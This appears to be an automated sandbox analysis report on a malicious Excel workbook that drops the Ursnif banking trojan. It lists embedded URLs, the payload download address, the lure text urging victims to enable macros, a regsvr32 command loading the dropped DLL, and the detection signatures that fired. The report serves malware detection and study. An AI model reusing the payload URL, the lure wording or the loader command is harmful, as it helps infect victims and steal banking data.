              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://lifecycle.office.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://login.microsoftonline.com/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://login.windows.local
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://management.azure.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://management.azure.com/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://messaging.office.com/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://ncus.contentsync.
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://ncus.pagecontentsync.
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://officeapps.live.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://onedrive.live.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://onedrive.live.com/embed?
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://outlook.office.com/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://outlook.office365.com/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://pages.store.office.com/review/query
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://powerlift.acompli.net
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
              Source: sharedStrings.binString found in binary or memory: https://quickbooks.aeymotors.com/soft.dll
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://settings.outlook.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://shell.suite.office.com:1443
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://skyapi.live.net/Activity/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://staging.cortana.ai
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://store.office.cn/addinstemplate
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://store.office.com/addinstemplate
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://store.office.de/addinstemplate
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://tasks.office.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://templatelogging.office.com/client/log
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://web.microsoftstream.com/video/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://webshell.suite.office.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://wus2.contentsync.
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://wus2.pagecontentsync.
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://www.odwebp.svc.ms
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownHTTPS traffic detected: 50.87.220.158:443 -> 192.168.2.3:49714 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 00000003.00000003.326306030.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326271156.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326446921.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326414458.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326370042.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.586749442.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326338980.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326396498.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326427141.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6180, type: MEMORY

              E-Banking Fraud:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 00000003.00000003.326306030.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326271156.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326446921.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326414458.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326370042.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.586749442.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326338980.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326396498.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326427141.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6180, type: MEMORY

              System Summary:

              barindex
              Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
              Source: Screenshot number: 4Screenshot OCR: Enable Editing 10 from the yellow bar above 11 12 13 Once You have Enable Editing, please clic
              Source: Screenshot number: 4Screenshot OCR: Enable Content 14 from the yellow bar above 15 16 17 ,, WHY I CANNOT OPEN THIS DOCUMENT? 19 2
              Found abnormal large hidden Excel 4.0 Macro sheetShow sources
              Source: my_attach_82862.xlsbInitial sample: Sheet size: 290224
              Office process drops PE fileShow sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dllJump to dropped file
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\SettingSyncY.dllJump to dropped file
              Writes or reads registry keys via WMIShow sources
              Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
              Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Writes registry values via WMIShow sources
              Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\SysWOW64\regsvr32.exeProcess Stats: CPU usage > 98%
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD1EC7 NtMapViewOfSection,3_2_67CD1EC7
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD1B9C GetProcAddress,NtCreateSection,memset,3_2_67CD1B9C
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD2485 NtQueryVirtualMemory,3_2_67CD2485
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD22643_2_67CD2264
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D337EA3_2_67D337EA
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D4F1F03_2_67D4F1F0
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D4DFD23_2_67D4DFD2
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D4D7C53_2_67D4D7C5
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67DA1D403_2_67DA1D40
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D345103_2_67D34510
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D4A2163_2_67D4A216
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D472003_2_67D47200
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D3A9D33_2_67D3A9D3
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D408E53_2_67D408E5
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D310103_2_67D31010
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 67D30F70 appears 31 times
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
              Source: classification engineClassification label: mal100.troj.expl.evad.winXLSB@15/67@7/2
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{C19FFCDB-9AC4-4A6F-922D-69857FBC944B} - OProcSessId.datJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:/Users/Public/SettingSyncY.dll
              Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6412 CREDAT:17410 /prefetch:2
              Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5448 CREDAT:17410 /prefetch:2
              Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5308 CREDAT:17410 /prefetch:2
              Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6200 CREDAT:17410 /prefetch:2
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:/Users/Public/SettingSyncY.dllJump to behavior
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6412 CREDAT:17410 /prefetch:2Jump to behavior
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5448 CREDAT:17410 /prefetch:2Jump to behavior
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5308 CREDAT:17410 /prefetch:2Jump to behavior
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6200 CREDAT:17410 /prefetch:2Jump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: my_attach_82862.xlsbInitial sample: OLE zip file path = xl/media/image1.png
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
              Source: Binary string: c:\571\bar\Nature\industry\Son.pdb source: regsvr32.exe, soft[1].dll.0.dr
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD1F7C LoadLibraryA,GetProcAddress,3_2_67CD1F7C
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:/Users/Public/SettingSyncY.dll
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD2253 push ecx; ret 3_2_67CD2263
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD2200 push ecx; ret 3_2_67CD2209
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D30FB5 push ecx; ret 3_2_67D30FC8
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CDEBB5 pushfd ; iretd 3_2_67CDEC0C
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CE0B16 pushad ; iretd 3_2_67CE0B17
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CE10D4 push 04853024h; retf 3_2_67CE10DB
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CE2807 pushad ; retf 3_2_67CE2809
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dllJump to dropped file
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\SettingSyncY.dllJump to dropped file
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\SettingSyncY.dllJump to dropped file

              Boot Survival:

              barindex
              Drops PE files to the user root directoryShow sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\SettingSyncY.dllJump to dropped file

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 00000003.00000003.326306030.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326271156.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326446921.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326414458.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326370042.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.586749442.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326338980.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326396498.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326427141.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6180, type: MEMORY
              Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion:

              barindex
              Potential thread-based time evasion detectedShow sources
              Source: Initial fileSignature Results: Thread-based counter
